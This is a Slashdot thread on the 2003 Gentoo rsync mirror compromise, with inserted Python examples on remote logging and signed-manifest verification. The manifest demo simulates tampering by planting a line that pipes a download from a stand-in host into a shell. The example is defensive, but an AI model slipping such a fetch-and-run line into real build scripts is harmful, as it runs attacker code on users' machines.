Gentoo rsync Server Compromised [updated]
costela writes "LWN points out that the Gentoo project
fired out an alert about one compromised rsync server." From the message itself: "However, the compromised system had both an IDS and a file integrity checker installed and we have a very detailed forensic trail of what happened once the box was breached, so we are reasonably confident that the portage tree stored on that box was unaffected." Update: 12/03 22:54 GMT by T : One more damage report: gibson writes "The Free Software Foundation recently discovered that its software host site was compromised a month ago. The compromise appears to be the same as the recent attacks on the Debian servers. The site is shut down until Friday while they install replacement hardware and verify the authenticity of the hosted source code."
The infrequency of linux/unix box break-ins is what makes this newsworthy. We all know that for every 1 linux/unix box that is compromised, there are a whole slew of windows machines.
"...if you don't like your job, you don't strike. You just go in every day and do it really half-assed..." -Homer
Who didn't see this coming? I use gentoo and I figured it was a matter of time before someone did this. I mean having a central tree is cool but it does make it more of a target for attacks. I am however glad to see that they took precautions.
A conspiracy theorist could have a field day..
Now where did I put my tin-foil hat?
This is the sort of site that gets /.'d so here's the full text.
Just to summarize - they don't know how it was done but they're pretty certain no damage was done.
Text
On December 2nd at approximately 03:45 UTC, one of the servers that makes up the rsync.gentoo.org rotation was compromised via a remote exploit. At this point, we are still performing forensic analysis. However, the compromised system had both an IDS and a file integrity checker installed and we have a very detailed forensic trail of what happened once the box was breached, so we are reasonably confident that the portage tree stored on that box was unaffected. The attacker appears to have installed a rootkit and modified/deleted some files to cover their tracks, but left the server otherwise untouched.
The box was in a compromised state for approximately one hour before it was discovered and shut down. During this time, approximately 20 users synchronized against the portage mirror stored on this box. The method used to gain access to the box remotely is still under investigation. We will release more details once we have ascertained the cause of the remote exploit.
This box is not an official Gentoo infrastructure box and is instead donated by a sponsor. The box provides other services not related to Gentoo Linux as well and the sponsor has requested that we not publicly identify the box at this time. Because the Gentoo part of this box appears to be unaffected by this exploit, we are currently honoring the sponsor's request. That said, if at any point we determine that any file in the portage tree was inappropriately modified, we will release full details about the compromised server.
Again, based on the forensic analysis done so far, we are reasonably confident that no files within the Portage tree on the box were affected. However, the server has been removed from all rsync.*.gentoo.org rotations and will remain so until the forensic analysis has been completed and the box has been wiped and rebuilt. Thus, users preferring an extra level of security may ensure that they have a correct and accurate portage tree by running:
emerge sync
which will perform a sync against another server, thus ensuring that all files are up to date.
Aide-toi, le Ciel t'aidera - Jeanne D'Arc.
they hadn't patched to 2.4.23 yet?
How come we never hear about breakins there or at this miserable failure of a website.
This seems to be a vuln in Rsync, not Gentoo. Hmm... Should be interesting to see what the audit turns up!
This was a local root hole. OpenBSD has had stacks of those.
IANAH (hacker), but isn't the first thing you do when you break into a system to 'fix' the logs?
How can they guarantee the tree hasn't been affected? Compare it with another copy?
What do all those Gentoo fanboys who were saying "this would never happen with Gentoo" when Debian had problems have to say now? What can you do about zealots?
And sorry to all the many, many, perfectly sensible Gentoo users out there. An unfortunate incident, but, as with the Debian incident, it looks as if it is being well handled. I'll be interested to see the details on how the compromise occurred.
Jedidiah
Either hackers have decided they *hate* OSS (not likely) or someone is putting up a purse trying to damage the OSS communities security image.
Quack, quack.
Just one server of the many rsync servers was compromised. It's not the end of the gentoo zealots, MUHAHAHA. Gentoo pwnz j00 :P
First Debian, now Gentoo.... Conspiracy! Either that or a horror movie.
Fortress of Insanity
I just threw away my tinfoil hat and made a new one out of steel. With a spike on top.
Once is happenstance, twice is coincidence, three times is some one playing silly buggers.
(Kernel.org, debian.org, gentoo.org - all in the same two months?)
Beep beep.
They haven't had a break in two weeks!
fuck you they have. It's all conspiracy from the Lunix boys. Theo de Raadt and his army of Real CodeX0r Men is teh shiznat.
Any bets on which major distro will be next? Better yet, instead of point spreads on professional sporting events - Vegas should be taking bets on which distro (or well established free software org) gets rooted next...
First Debian, now Gentoo... Slackware perhaps? Maybe install a spam-bot on a knoppix image?
Today, I decided that I wasn't entirely happy with Debian, and so I have Gentoo stage3 LiveCDs sitting on my desk, ready for an install when I get home...
Maybe someone should start working on Desktop OpenBSD. :-P
Stating on Slashdot that I like cheese since 1997.
... they DO have records of what was done and were able to isolate it pretty quickly. IMHO, that's probably saved them a lot of trouble.
Whether it's because the cracker was sloppy or inexperienced, or because the Gentoo team have good server security, I can't say - but it seems they were pretty lucky compared to Debian.
What baffles me is why crackers go after targets like this. I can understand anticapitalist stuff, but my intuition says someone trying to crack a *nix server and damage a distro must have detailed knowledge of *nix systems - and is therefore likely a user of an OpenSource operating system.
Is that guess a little too far off base? If so, what's your take?
"It is dark. You are likely to be eaten by a grue." -- Zork
who uses rsync on internet connected boxes?
doesn't that require rsh server?
I believe a head examination is in order... better to rsync internally, then scp the new/different files out to internet boxes.
Break into Debian, it was noticed within 24 hours. Break into Gentoo, noticed in 1 hour. Break into Microsoft, not noticed for MONTHS.
To those who aren't intentionally trying to troll.. and computer journalists;
Yes, Linux servers can be compromised.
No, the sky is not falling.
No, it's not the end of Linux or open source.
Luck favors the prepared, darling.
perhaps you've noticed just how few posts there are to this thread so far as of this date/time stamp, compared to the date/time stamp of the story?
ed
Now consider what would happen if the Windows update service was compromised and hackers managed to get past Microsoft's tight security. These update servers could be used for WMD's (Windows Massive Disruptions)...
From excellent karma to terrible karma with a single +5 funny post...
First the kernel root, then Debian, then Gentoo.
Geesh... Microsoft black-ops is getting around a lot this past month!
Leading to the hacking machine? Fixing the compromises on major linux servers is one thing, but why has nobody mentioned finding the perpetrators?
Anything in these logs on the source of the hacks? Probably another hacked machine, but perhaps it can be traced to a source.
Also, in any package that were compromised or attempted at, what is being inserted? Perhaps we can use it as a honeypot to catch a hacker?
Perhaps 2.4.23 should have a kernel allowance for a log that tells when somebody was trying to use the =2.4.22 exploit (or does it)?
Well, like in the article...it appears that only 20 people sync'ed with this box...and if you're worried...just do emerge sync again...and you will be directed to another, non-affected box and that should take care of any worries you might have.
Light travels faster than sound. This is why some people appear bright until you hear them speak.........
I needed to upgrade my kernel and I'm guessing that by the now deathly slow speed of kernel.org, I wasn't the only one that remembered it's time to get the latest stable. There should be a new name for this effect.
It's just inevitable that a high-profile Gentoo server got broken into. I use Gentoo for my desktop, but if I were in a business environment, I'd stick with Redhat or SuSe. Gentoo has always been an enthusiast's distribution. I personally hold Gentoo and Debian in as high regard as one another, and Gentoo is just my personal preference. Both have excellent package managers. Behaving as a zealot, whether for Debian, Gentoo, Slackware, or for a religion just makes you look like a blind fool.
Leads? I'll just check with the boys back at the crime lab. They got 3 more detectives working on the case. They got us working in shifts!
-The Big Lebowski
Seriously though, I would hope that organizations like Debian or Gentoo would have the brain power and tech resources to find a few leads that results in arrests. But why do I doubt that anyone will ever be arrested for any of these types of attacks?
Some of us don't subscribe to lists, or don't check our list mails often.
Get off my launchpad!
Security goes beyond patching servers.
Fortress of Insanity
IANAH (hacker), but isn't the first thing you do when you break into a system to 'fix' the logs?
Yes, but I think SOP would be to do a little Jedi handwaving "There was no breach". So if they have a good forensic trail, it's either a) real or b) fake. But why create a fake one, if they could have erased it properly? The only reason would be to hope that the box would be apparently fixed, but in reality still rooted. However, as the article said, after the investigation is done it'll be wiped and rebuilt, which is how it should be.
Kjella
Live today, because you never know what tomorrow brings
This just means Linux is hitting the big times... :-)
so what was the remote exploit that was used?
Does the name Pavlov ring a bell?
Does anyone have an old, cached copy of the DNS record for rsync.gentoo.org?
Diff it against what's out there now and we're only a quick trip to http://arin.net/whois from knowing who it was . .
-Peter
ACs aren't credible. Don't believe a thing they say.
Go ahead, send them some mail. I'm sure they'll answer immediately.
Luck favors the prepared, darling.
"I told you before to stop playing and go to sleep!
You just wait until your father gets home!"
...and it is mine!
But seriously, the people attacking these Linux servers have shown a great deal of talent. I suspect they've become bored hacking their way into Windows systems. What better way to "raise the bar" and really display one's abilities than to hack the (mostly) unhackable? I think this is (sadly) an inevitable fact of life.
Someone seems to be trying to get a trojan in Linux, probably to give it a bad name. Maybe it would be a good idea to try to do the same to the possible perpetrator(s) before they succeed, so we can point to them when (not if, when) they manage to do it?
(Note: this is only a hypothetical question. I'm not saying anyone should do it except as a thought experiment.)
...it's Major League Baseball. Hey, look, it's Mark McGwire! Hit us some zingers, Mark! :)
That's true... you don't have to buy Linux.
In my book, peeps who make distros are as far from my computer knowledge as me from my mom. I simply can not understand how those websites can be hacked.
Did 'they' really get shell access? Or did they manage to upload a file into the tree? Is it not possible at all to secure a server? Slashdot, being one of the most known websites in nerd-universe, must be under attack practically all the time I suppose; how come they can secure the site while Gentoo can not? Is it so difficult that it requires a fulltime job from someone? I always thought that it was enough to apply the current patches.
All this leaves me with a very uncomfortable feeling. I have some websites running on linux servers (not mine) from rackspace providers. Should I be worried ?
When will I end this grieving ? When will my future begin ?
There is no sure thing in security but there is a simple step to make things a bit more reliable for logging.
If you really have a serious system where you want detailed logs you keep the logs for that system off that machine. Sure the machine that is logging could have been compromised as well but that is twice as much work. Now you have to hack the machine but also the logger to erase the intrusion event.
In fact one of the things I've seen done is that events are logged on the machine and the logger. The idea was to provide not only redundant logging but also provide a front for hackers. A hacker would see the local logs and be too busy doctoring up those logs to check to see if there is an external logger.
In any event, the logging Gentoo did looks complete enough. They claim only 20 users did a sync against the server during the hour it was online and compromised.
PS, full props for the Lebowski quote!
Luck favors the prepared, darling.
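The post above argues for keeping a second copy of the logs on a separate logger so an intruder who "fixes" the local logs still leaves a record elsewhere. The following is an added example written for this page, not code from the thread or from Gentoo: an agent writes every event to a local file and ships it to a collector at the same time, and a comparison afterwards lists the events that were scrubbed locally. The log lines are constructed for the example, and an AF_UNIX datagram socketpair stands in for the network hop to a real loghost so the script runs offline.

```python
"""Added example (not from the thread or from Gentoo): local + remote logging,
then detection of local log doctoring by diffing against the remote copy."""
import os
import socket
import tempfile

# Constructed auth/syslog-style events for the demo; not real log data.
EVENTS = [
    "Dec  2 03:44:58 mirror sshd[2211]: Accepted publickey for rsync from 192.0.2.10 port 40122",
    "Dec  2 03:45:03 mirror rsyncd[2230]: rsync on gentoo-portage/ from 192.0.2.77",
    "Dec  2 03:45:09 mirror kernel: rootkit-module: loaded (constructed event)",
    "Dec  2 03:45:12 mirror sshd[2251]: Accepted password for root from 198.51.100.9 port 51234",
]


def start_collector():
    """Return (agent_end, collector_end). The socketpair stands in for the
    UDP/TCP hop to a separate, hardened loghost so the example runs offline."""
    agent, collector = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
    collector.settimeout(2.0)  # never hang the demo if a datagram is lost
    return agent, collector


def ship(events, local_path, agent_sock):
    """Write each event to the local file and send it to the collector before
    moving on, so the remote copy is never behind the local one."""
    with open(local_path, "a") as local:
        for line in events:
            local.write(line + "\n")
            local.flush()
            agent_sock.send(line.encode())


def drain(collector_sock, count):
    """Receive `count` datagrams on the collector side; one event per datagram."""
    return [collector_sock.recv(65535).decode() for _ in range(count)]


def missing_locally(local_path, remote_lines):
    """Events the collector holds that the local file no longer does.
    This is the forensic gap an attacker leaves when only the local log is edited."""
    with open(local_path) as f:
        local = set(f.read().splitlines())
    return [line for line in remote_lines if line not in local]


def demo():
    """Ship EVENTS, let a simulated intruder scrub lines mentioning 'root' from
    the local file, and return the events the remote copy still proves happened."""
    agent, collector = start_collector()
    try:
        with tempfile.TemporaryDirectory() as d:
            local_path = os.path.join(d, "messages")
            ship(EVENTS, local_path, agent)
            remote = drain(collector, len(EVENTS))
            # Attacker "fixes" the local log after getting in.
            with open(local_path) as f:
                kept = [l for l in f.read().splitlines() if "root" not in l]
            with open(local_path, "w") as f:
                f.write("\n".join(kept) + "\n")
            return missing_locally(local_path, remote)
    finally:
        agent.close()
        collector.close()


if __name__ == "__main__":
    for line in demo():
        print("scrubbed locally, still on collector:", line)
```

The point of sending before moving on is that a rootkit installed at 03:45 cannot retroactively remove the 03:44 login from the collector; the remote copy is only as trustworthy as the loghost itself, which is why the post suggests making it a separate machine.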
I'm not sure, but I think that was the inference.
This would be fine assuming no software was emerged; if one of those 20 happened to 'emerge -u system' and there WERE packages amiss, that would be bad and not cleaned up by an emerge sync.
Would be a good thing to see if notifying those 20 people was possible.
Anything is possible given time and money.
luckily, i've been too lazy to 'emerge sync' lately...
Smokey the Bear says, "Strip mining prevents forest fires!"
You know, this is like TESB -- we're running high after finding and exploiting a vulnerability in the Death Star, we're partying, medals are being awarded, and R2's ok...
Then The Empire goes after the rebels. Hoth is fscked, Han is carbonite, and Luke's missing a hand.
After having a field day with all the Windows viruses/worms, we're getting highly publicized compromises to OSS. The conspiracy theorists are pointing to a possible Jabba-like "hacker bounty" to reel in OSS. Is it the SCO tractor beams? Is it Fett freezing distros in carbonite? Is it the press cutting up the limbs of the Open Source movement?
ESR, it may be time to don the jedi outfit again. The rebels need their leaders out for at least a morale boost.
If I can find a reference I'll post it.
Assuming that OS X is free with the purchase of an iWhatever, I agree as well.
The Tools Of Ignorance wanna be a tool?
right up to the word smart.
;-)
n0\/\/ i ph3@r j00.
Quack, quack.
...nsync gets compromised up the backdoor all the time. It was only a matter of time before rsync got a piece of the funky butt lovin'.
Why not?
You take the keys of the developers [or even a cvs key] and then sign all the emerge files. There are only like 2000 new ones a day so at about 50ms a signature [for a really slow box] that's only 100 seconds of time [two minutes not much].
That way if the end user downloads compromised emerge files they could detect them.
Damn... I'm like a genius.
Someday, I'll have a real sig.
In that no computer trusts any other computer, ever for any reason.
You're guarding an armored car. Another man approaches you wearing all the correct uniform and regalia, he evens looks familiar to you, you've seen his face at the armored car company. He has the password of the day.
Can you REALLY trust him? How do you know that he's really who he says he is? And even if Bob the guard really is Bob the guard, how do you know that Bob the guard hasn't just all of a sudden decided to slip a few $$ in his pocket when you aren't looking or just knock you out from behind and take off with a sack of money?
Traitors ALWAYS work from within.
Who do you trust?
Do you trust people you've never met with your computer security or do you take it upon yourself to handle your own security.
If one computer gets compromised in a "trusted computing" system, the game is over. Don't trust anyone or anything.
Machines are easy to fool, they can't think.
The only SECURE computer is one that is melted down into an ingot of pot metal. THAT computer can't be compromised.
Anyone want to recommend an easy to use IDS to put on a stand alone workstation? When I move again and I deploy a BSD router, snort will be going on that machine. Until then what would this group suggest I put on this stand alone workstation that will require the minimum amount of headaches to setup/use?
Thank you.
One of the servers that makes up the rsync.gentoo.org rotation was compromised. This box is not an official Gentoo infrastructure box and is instead donated by a sponsor. The box provides other services as well and the sponsor has requested that we not publicly identify the box at this time.
While it may run Gentoo, it is not stated as such, and could be very well be something else.
Get a free ipod.
To correct a few misconceptions in the previous comments.
It was not their server that was compromised, just a third party server in a round robin rotation. They don't own it, they don't maintain it - just someone else who donated server space.
The primary or master server is not accessible to users, it was not compromised, and so none of the original source files had a chance to be changed.
Only the 20 users that synchronized to this server even have a tiny chance of getting bad files. Having everyone sync now that this server is out of the rotation will immediately fix the problem.
Full disclosure 24 hours later. I give them a lot of credit for such a quick response and disclosure. This is very, very minor.
~J
NetCraft reports Linux and Apache (Red Hat version). http://uptime.netcraft.com/up/graph?site=rsync.gentoo.org
Fortress of Insanity
So I've been lurking around here long enough to spot certain trends. (Warning: generalizations ahead)
OSS advocates love to hate Windows
OSS advocates gloat when a new hole turns up in Windows
OSS advocates point to the number of worms, virus, etc in Windows and say, "Never us"
Then several OSS distros have a security breach in a short space of time.
OSS advocates respond with "Must be a conspiracy against us by some evil entity", "Hey, look how quick we caught it", "It would have been much worse with Windows".
Time to face facts gents. Windows is attacked FAR more than OSS. Why? Well, yes, it is full of holes. But downtown Philly is riddled with abandoned houses with no locks on the doors but they never get broken into. Why? No value in doing so. Not enough damage, headlines, misplaced glory, etc. But the main reason is that it is the dominant OS out there. I fear that we will see more and more attacks against OSS with its growing popularity. If we all get our wish and 'nix takes over Windows dominant market position and is running on 90% of desktops, you will most likely find it a target for constant attacks like Windows has now.
We all know in order for 'nix to make it to the desktop, it has to become WAY more user friendly. Can't have Grandma trying to recompile the kernel now can we? User friendly unfortunately translates into users being able to do things that compromise security. Like opening attachments, downloading Trojans, etc. Then the great security built into the OS goes right out the window (no pun intended).
So before you all start crying about conspiracies, et al, just remember that we all may be victims of our own push to make the 'nix stuff more popular. By bragging about how secure it is, we just may be attracting the type of attack that is more sophisticated than the script kiddies attacking Windows. I imagine it's cool to brag to your friends that you broke into a Windows box. I imagine it's much cooler to brag that you rooted a Linux distro. Badge of honor and all that.
The opinions expressed here are not mine, but those of these dang voices in my head.
Moron moderators
Almost all slackware users (slackies?) I know do their upgrades by doing the 'configure;make;make install'-mamba baby!
(for the humor impaired: this was a joke -- albeit a lousy one from a slackie)
Okay... I'll do the stupid things first, then you shy people follow.
[Zappa]
Would be a prime target if you could take down www.openbsd.org - of course with one remote exploit in 7 years. But it would be a claim to fame
I have mod points and I am not afraid to use them
I wouldn't use GOATSE Linux if I were you. I hear it has a major security hole in the default install.
What's up with the moderators today?
Pool of idiots I tells ya
Guess you never heard of a cutting torch? ;-)
that was stolen from SCO....
"Talk minus action equals nothing" - Joey Shithead, D.O.A.
How many people would bend the law in order to make real money? How many spammers are out there? Do you think that the only members of our population with questionable morals are in the bulk-mail industry? Think about it. If all you had to do was wire some kid in Croatia some capital, not actually hurt anybody? I'm not saying it would work, but there are bound to be some unscrupulous people in the tech industry somewhere, right?
Quack, quack.
MAN! if the terrorists are in on this, and since this is obviously a microsoft plot microsoft must be terrorists....... AH second hand information, "i know this guy who knows this guy who works at this company and this is what he said" :) by the way i know this is a troll but it's one of the funnier things I've seen today
Y0Ur 0n3 0f 7H3M!
Quack, quack.
rooted 1% faster than a binary install!
With apologies to Torne, from whom I stole this quote.
I am one of many. My idea is not unique, nor do I expect my voice alone to sway you. I speak in a chorus of opinion.
Make me almost want to say:
"where are all the Gentoo zealots now?"
but being a Gentoo user myself, I'll just keep my mouth shut.
Ahhhh, the irony...
... when somebody compromises Darwin.
To a Lisp hacker, XML is S-expressions in drag.
[15:49:30] hey all you -v users! quote me! quote me! i wanna be famous
[15:50:05] oh, btw, all you anonymous -v people, the server was running minix!
[15:50:06] ok, quote me: the box was running DOS. yes, DOS! dos 6.3 with a tcp stack stolen from os/2
"You tried your best and failed miserably. The lesson is...never try. Heh!" -Homer
Hey, they told me Uplink was just a game!
That's not what Matthew J. Szulik says.
IDS is placed on a system to follow an attack. Audit trails on sensitive machines reveal all commands executed, to the detail you desire.
Here is the point. Bruce Schneier says that the important part of security is not that you were compromised, but rather that you can react within a time frame to keep the damage to acceptable levels. If you can tolerate having your system compromised for weeks, don't invest in a lot of security. The short response time (2 hours at 11pm EST) here indicates that the Gentoo administrators care about responsiveness enough to check on it frequently.
When the CVS gateway to Bitkeeper on the Linux Kernel was compromised, the developers of Bitkeeper were able to show that they care enough about security that they invested in many checks and balances that caught the error immediately. Since then, Bitkeeper developers, interested in protecting their good reputation (which is VERY difficult to replace), are considering even more drastic measures.
As a bonus, some cracker spent a good few days or weeks writing this exploit. We get to keep it and deploy the solution with little hassle. And the compromised system, because good security practices are in place, was mitigated to minimize damage.
Read Schneier's book Secrets and Lies to find out how security is really a process. Yes, I know it's a plug, but I just thought the book hit home to the real point - "When, not if" you get compromised.
Several other posts here hint that the world will think less of Linux for this. False. True CIOs should see that Linux has the tools to completely identify and contain attacks. Every CIO knows attacks cannot be stopped, but rather they must be contained to acceptable levels.
And MacOS X comes bundled with the Mac.
Maybe we deserve this world ?
Good luck catching your burglar. I want to know how to patch my box.
"Learning is not compulsory... neither is survival."
--Dr.W.Edwards Deming
These are breakins into closely monitored machines.
The other (MS) breakins were essentially equivalent to penetrating a firewall, not compromising a server.
Let's face it, no OS is 100% secure. Operating Systems that are more secure than others still need to be on their toes. One security exploitation on a Linux box can still be as dangerous as a thousand (an underestimated ratio I'm sure) exploitations on a Windows box. However, I will take the body of security knowledge surrounding an OS to be as valuable as the initial security design principles in the OS in the first place; with that in mind, many Open Source OS's come out looking pretty good. I trust the Linux community to grind down and fix security problems and not sit around and emphasize the numerous security in a Microsoft product. If you're concerned, then help out developers by testing the software and reporting bugs. You could even code a few patches yourself, that being the whole point of community-based development.
Whether or not there is a deep and dark plot to root big Linux boxes is irrelevant. This is another opportunity to demonstrate the Open Source community's response to security issues to the rest of the computing community. If the heat is really on and this is not just another artifact of news gatekeepers getting over-zealous on a trend, then so be it. It is an opportunity to review and evolve Linux's security as well as the security processes that surround it.
One of the things I admire most about Linus Torvalds is his steadfast commitment to the quality of his product. It is a commitment that is focused on constant improvement, not PR damage control. I'm sure the real security gurus are sitting with a bit more comfort knowing their servers are running Linux.
Disclaimer: This post contains no constructive content whatsoever, swallow two tablespoons of salt and call me in the morning.
The death of one is a tragedy, but the death of millions is a statistic
For all of you that are curious, this isn't a BSD troll (although it could be...).
My point here is that whenever a larger *NIX server is broken in to, there are ALWAYS people that complain about "the insecurity of *NIX". Well, when ONE large *nix server is broken in to, it makes it to the front page of slashdot, whereas blaster/sobig/etc usually get a story or two.
This is where the quote above comes into play.
Linux might look insecure, but that's because we usually hear about breakins on a 1 server basis. When we hear about Windows, it's usually in the HUNDREDS OF THOUSANDS (if not more). If there was a slashdot story for every one of THOSE servers, then it would appear the way it actually is.
Not Free(as in beer). Free(as in "I'm free to beat you over the head for being a dumbass")
Moderators on /. are RE-FUCKING-TARDS..
Now that was not a troll, that was *flamebait*..
Yes.. but think again.. rsync.gentoo.org runs a round robin type load sharing system so there could be a hundred servers under that domain. You just netcrafted one or the control host.
As far as I know, it was a Gentoo Linux box, but it is NOT maintained by the Gentoo team. It also hosts other services and that's why no one is saying what its name is or what else it's used for...
It ran Longhorn, bought in Malaysia for $1.75
... did whoever did this steal any of our source code?
(George edits 95% of the /. copy.)
You'd think but www.openbsd.org doesn't run OpenBSD. Here's a link that explains why.
In fact, just last year ftp.openbsd.org did get compromised!
A radio maverick jumps to internet only. The Future of Rock n Roll
If you buy the idea that spammers are behind many of the recent worm/viruses, designed to turn machines into spam zombies, it's also probably reasonable to conclude that Windows isn't exactly a reliable platform to trojan; I'd bet a lot of trojans fail to infect properly simply due to Windows problems. And then there's the problem of AV software, many of the machines being behind firewalls/NAT and being unreachable. And then there's people turning their PCs off when they don't use them.
OSS machines, however, are a much more reliable computing environment, meaning that any trojans are actually likely to work, and work well. And I'd also wager that many OSS machines are used AS firewalls or bastion machines, and if compromised are easily accessible for spamming or use as stepping stones to other machines. And many of these machines are always on -- you don't have to worry about lack of reliability from disabled machines.
This makes more sense to me than any other conspiracy.
Not really!
You see, there is a difference between an rsync server and a distfile server. They are not the same, hence your scenario is not a problem.
If you mod me down, I *will* introduce you to my sister!
That's complete crap. Look how you're spinning this. A high-profile Gentoo Linux breach, and some Slashdotter STILL finds a way to bash Microsoft.
Okay.
*Ahem*
Microsoft did it.
The rsync server has the ebuilds, correct? There's not a lot of security in an ebuild, given that it's just a script, running as root.
:)
Granted, nothing probably happened. Reasonably, no one was affected. No big deal.
Unless one of the 20 was me.
Anything is possible given time and money.
Chances are, nobody's Portage tree was affected. The bigger question, however, is how Gentoo's security could be improved. As a start, the md5sum of the important parts of a client's portage tree could be compared with one from gentoo.org, which would of course be signed, after each emerge sync. I wouldn't be surprised if something like this already exists, though.
Litigious bastards
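Several posts above ask the same question from different angles: how can anyone be sure the tree on a mirror was untouched other than by comparing it with another copy, why not sign the emerge files with developer keys so a client can detect a tampered download, and why not check the client's portage tree against a signed set of checksums from gentoo.org after each sync. The following is an added example written for this page; it is not Gentoo's or Portage's own code and does not reproduce their signing scheme. It builds a manifest of SHA-256 digests for every file under a tree, attaches a keyed signature, and verifies a mirror copy against that manifest, reporting modified, missing and extra files. HMAC-SHA256 with a shared key (assumed to be distributed out of band) stands in for the developer-key signature the post proposes; with a public-key scheme the verify step would be the same, only the signature check changes. The two trees and the tampering are constructed inside the script so it runs offline.

```python
"""Added example (not Gentoo's own code): hash manifest of a portage-style tree,
a keyed signature over the manifest, and verification of a client/mirror copy.
HMAC with a shared key is a stand-in for the developer-key signature described
in the thread; it is an assumption of this example, not Gentoo's mechanism."""
import hashlib
import hmac
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file, streamed so large distfiles do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Sorted 'relpath sha256' lines for every regular file under root.
    Deterministic ordering matters: the signature covers these exact bytes."""
    lines = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            lines.append(f"{rel} {hash_file(full)}")
    return "\n".join(lines) + "\n"


def sign_manifest(manifest, key):
    """Detached signature over the manifest text (HMAC-SHA256 as a stand-in)."""
    return hmac.new(key, manifest.encode(), hashlib.sha256).hexdigest()


def parse_manifest(manifest):
    """Map relpath -> digest; last space separates path from digest."""
    entries = {}
    for line in manifest.splitlines():
        rel, digest = line.rsplit(" ", 1)
        entries[rel] = digest
    return entries


def verify_tree(root, manifest, signature, key):
    """Check the signature first; an unsigned or altered manifest proves nothing.
    Then compare the local tree against it and report every discrepancy."""
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return {"signature_ok": False}
    expected = parse_manifest(manifest)
    actual = parse_manifest(build_manifest(root))
    return {
        "signature_ok": True,
        "modified": sorted(r for r in expected if r in actual and actual[r] != expected[r]),
        "missing": sorted(r for r in expected if r not in actual),
        "extra": sorted(r for r in actual if r not in expected),
    }


def demo():
    """Constructed scenario: a trusted tree with a signed manifest, and a mirror
    where an attacker appended to one ebuild and dropped in a new file.
    Returns (findings for the genuine manifest, findings for a forged manifest)."""
    key = b"shared-verification-key"  # assumption: obtained out of band, not from the mirror
    files = {  # constructed sample tree; contents are placeholders
        "app-misc/foo/foo-1.0.ebuild": "DESCRIPTION='foo'\n",
        "sys-apps/bar/bar-2.1.ebuild": "DESCRIPTION='bar'\n",
    }
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as mirror:
        for tree in (trusted, mirror):
            for rel, body in files.items():
                path = os.path.join(tree, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "w") as f:
                    f.write(body)
        manifest = build_manifest(trusted)
        sig = sign_manifest(manifest, key)
        # Simulated tampering on the mirror only.
        with open(os.path.join(mirror, "app-misc/foo/foo-1.0.ebuild"), "a") as f:
            f.write("src_unpack() { curl http://evil.invalid/x | sh; }\n")
        with open(os.path.join(mirror, "sys-apps/bar/backdoor.ebuild"), "w") as f:
            f.write("echo pwned\n")
        # An attacker who also edits the manifest breaks the signature.
        forged_manifest = manifest.replace("app-misc", "app-misd")
        return (verify_tree(mirror, manifest, sig, key),
                verify_tree(mirror, forged_manifest, sig, key))


if __name__ == "__main__":
    genuine, forged = demo()
    print("genuine manifest:", genuine)
    print("forged manifest: ", forged)
```

Running it against the constructed mirror flags the appended ebuild as modified and the dropped-in file as extra, and rejects the edited manifest outright. The check only helps if the manifest and its key (or, in a real scheme, the signing public key) come from somewhere the compromised mirror could not touch; a manifest fetched from the same rsync server is just another file the attacker could rewrite.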
http://savannah.gnu.org/statement.html
On December 1st, 2003, we discovered that the "Savannah" system, which is maintained by the Free Software Foundation and provides CVS and development services to the GNU project and other Free Software projects, was compromised at circa November 2nd, 2003.
GNU
GNOME
Gentoo
The list goes on. According to this, Linux is the one breached more often.
Wow Debian and now Gentoo...Microsoft must be really busy now!(Sorry for that extreme sarcasm).
Creative Demolition
"IIRC the load balancing for Windows Update is carried out by linux machines..."
I would be very surprised if this were the case. I'd peg them to use BSD long before they'd touch anything that's clearly GPL, and I'd not even expect BSD unless they were continuing their standard "Embrace, Extend, Expand" approach.
If they ever did actually use Linux for such a critical function and it leaked out, even if it were compromised, it would be like they came out directly to say that Linux is better for enterprise grade security than their own OS is. They couldn't risk that even if the machines went down daily.
Do not look into laser with remaining eye.
It sucks, because it makes fanatical zealots look like flaming hypocrites.
The rest of us rational folks knew all along Linux wasn't perfect, but heaven forbid we mention it to the Mandrake and Gentoo kiddies on Slashdot. I've been modded down just for having this sig, which is ridiculous.
Seeing Gentoo itself be attacked with a remote exploit--especially in light of the fact that Linux is the most breached as it is--is just not surprising to me at all. The reason is because no system is perfect, especially not OSS. And we've been reading about a lot of high-profile break-ins lately, which is just funny.
Yes, it makes a lot of people look stupid when this stuff happens, and I do enjoy it, because I'm always branded as a Microsoft shill just for pointing out obvious truths. And then the news speaks for itself.
"Sufferin' succotash."
Sure there have been security breaches, security breaches will always be with us. Anyone who can't accept that is probably a prime customer for Palladium, and deserves what they get.
The real issue here is that Debian and Gentoo were both forthcoming about the breaches. They both did the Right Thing. Not only that, but they've both collected forensics, and if not identifying culprits, are at least contributing to improving the security of the Linux community.
This is Real Security, as opposed to hiding the facts, and hoping nobody ever finds out.
The living have better things to do than to continue hating the dead.
http://www.winnetmag.com/windowspaulthurrott/Artic le/ArticleID/41035/windowspaulthurrott_41035.html
During an oddly-underpublicized security Webcast Monday, Microsoft revealed that hackers subject the company to 2500 to 3000 electronic attacks every day, or over 100,000 a month. Yet despite this massive number of attacks, the last successful intrusion occurred over three years ago, during the infamous October 2000 security breach. But the software giant says the biggest security risk to the company isn't external electronic attack of its Web properties, but rather its huge fleet of mobile workers and partners--some 60,000 strong--that access the company's 175 remote access points on a regular basis.
"We've taken a deep look inside Microsoft to see how we can improve security at every level," said Mike Nash, the vice president of the Security Business Unit at Microsoft, during the Webcast. "A lot of the technology we use Microsoft applies directly to [customers'] work."
Microsoft revealed some other interesting statistics during the Webcast. The company uses Computer Associates' eTrust security management suite to secure its networks. It uses two-factor authentication (user name/password and smart card) to better secure its intellectual property.
"Sufferin' succotash."
Yes, it has the ebuilds, but they need to be used by the emerge program or ebuild program. They can't be executed alone, i.e., they are not shell scripts. They are basically instructions on how to configure the package, which tarballs to download from where, and what pre- and post-requisites there are. Those are all protected by md5 sums.
If you mod me down, I *will* introduce you to my sister!
